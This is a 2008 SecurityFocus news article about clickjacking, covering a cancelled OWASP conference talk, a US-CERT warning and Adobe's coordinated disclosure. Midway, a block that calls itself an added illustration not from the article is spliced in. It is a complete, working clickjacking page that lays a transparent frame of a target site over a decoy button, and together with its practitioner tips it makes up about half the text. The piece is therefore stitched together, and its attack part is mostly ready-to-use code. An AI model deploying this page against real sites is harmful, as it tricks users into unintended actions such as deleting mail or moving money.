SecurityFocus 2008-09-30
What's the harm in clicking on a button?
That's the central question being discussed by security professionals following the cancellation of a presentation on user-interface overlays -- or "clickjacking" as some have dubbed the threat -- at last week's Open Web Application Security Project (OWASP) AppSec conference in New York City.
On Friday, the U.S. Computer Emergency Readiness Team (US-CERT) warned network administrators to beware of the technique.
"Clickjacking gives an attacker the ability to trick a user into clicking on something only barely or momentarily noticeable," the group stated. "Therefore, if a user clicks on a web page, they may actually be clicking on content from another page."
Two researchers, Robert Hansen and Jeremiah Grossman, had planned to discuss at AppSec the threat of using Web graphics to persuade a victim to click where an attacker wants on a page. The technique, also known as user-interface (UI) redressing or IFRAME overlay, lets an attacker hide a button or link on a legitimate page, such as a bank's account page or a Web mail application, beneath other Web content that masks the page's true context.
A Web user might think, for example, that they are clicking on a button to close a dialog box, when the button press in reality deletes all their e-mail messages in Gmail. Or, a user might believe they are clicking on a button to decline to take a survey, when they are actually transferring money from their bank. The technique could be used to raise an article's Digg score or get paid for a pay-for-click advertisement, said Grossman, the chief technology officer for Web security firm White Hat Security.
"The list is virtually endless and these are the more relatively harmless examples," he told SecurityFocus in an e-mail interview. "Next consider that an attack can invisibly hover these buttons below the user's mouse, so that when they click on something they visually see, they actually are clicking on something the attacker wants them to. Now, what could the bad guy potentially do with that ability? The more we researched, the worse the exploits become."
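The overlay described above, as an added illustration that is not from the article and not the researchers' demo: an attacker page frames a hypothetical target (the URL http://target.example/settings, the button coordinates inside it, and the element ids are all assumptions) and slides the fully transparent frame so the target's sensitive button sits exactly on top of a visible "No thanks, close" decoy. The victim aims at the decoy, but the click is delivered to the frame.

```html
<!DOCTYPE html>
<!-- Added example, not code from the article. The target URL, its button
     position and the element ids are assumptions made for the demo. -->
<html>
<head>
<meta charset="utf-8">
<title>Quick survey</title>
<style>
  body { margin: 0; font-family: sans-serif; }
  #bait { margin: 80px auto; width: 320px; padding: 16px; border: 1px solid #ccc; }
  /* The decoy is what the victim sees and believes they are clicking. */
  #decoy { position: relative; z-index: 1; padding: 8px 20px; }
  /* The framed target is layered ABOVE the decoy but fully transparent,
     so the click lands inside the frame rather than on the decoy. */
  #target {
    position: absolute; z-index: 2;
    opacity: 0;               /* invisible, yet still receives clicks */
    border: 0;
    width: 1000px; height: 800px;
  }
</style>
</head>
<body>
<div id="bait">
  <p>Thanks for visiting! Would you take our two-question survey?</p>
  <button>Sure</button>
  <button id="decoy">No thanks, close</button>
</div>

<!-- Assumed target page: a logged-in settings page with a dangerous button. -->
<iframe id="target" src="http://target.example/settings"></iframe>

<script>
// Where the button we want clicked sits inside the framed target page.
// These are assumed coordinates; an attacker measures them in advance.
const TARGET_BUTTON = { x: 340, y: 260 };

const decoy = document.getElementById('decoy');
const frame = document.getElementById('target');

// Slide the transparent frame so TARGET_BUTTON covers the decoy exactly.
// getBoundingClientRect gives viewport coordinates; add the scroll offset
// because the frame is positioned relative to the document.
function alignFrame() {
  const d = decoy.getBoundingClientRect();
  frame.style.left = (d.left + window.scrollX - TARGET_BUTTON.x) + 'px';
  frame.style.top  = (d.top  + window.scrollY - TARGET_BUTTON.y) + 'px';
}

alignFrame();
// Re-align if the layout shifts, otherwise the decoy and the button drift apart.
window.addEventListener('resize', alignFrame);
</script>
</body>
</html>
```

Two caveats a practitioner will want. First, the attack only works if the target allows itself to be framed at all; at the time of this article the only countermeasure was script-based frame-busting on the target page, and the header-based controls browsers later added (X-Frame-Options, and the Content-Security-Policy frame-ancestors directive) are exactly what the "fix or fixes" from browser vendors mentioned below refer to in practice. Second, the follow-the-mouse variant Grossman describes needs more than this static alignment: once a cross-origin frame is under the cursor, the frame's document, not the attacker page, receives the mouse events, so the attacker's script stops seeing the pointer position while it is over the frame.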
Hansen and Grossman canceled their presentation after demonstrating to software maker Adobe that one of its products could be affected by the attack.
"While they saw this issue as primarily a web browser issue, they showed us that one of their demos included an Adobe product," David Lenoe, a program manager for Adobe's Product Security Incident Response Team (PSIRT), said in a blog post. "We worked together with Robert and Jeremiah to assess the impact of this issue, and they determined that it was in our customers' best interest to refrain from making this issue public until Adobe and web browser vendors have a chance to provide a fix or fixes to our mutual customers."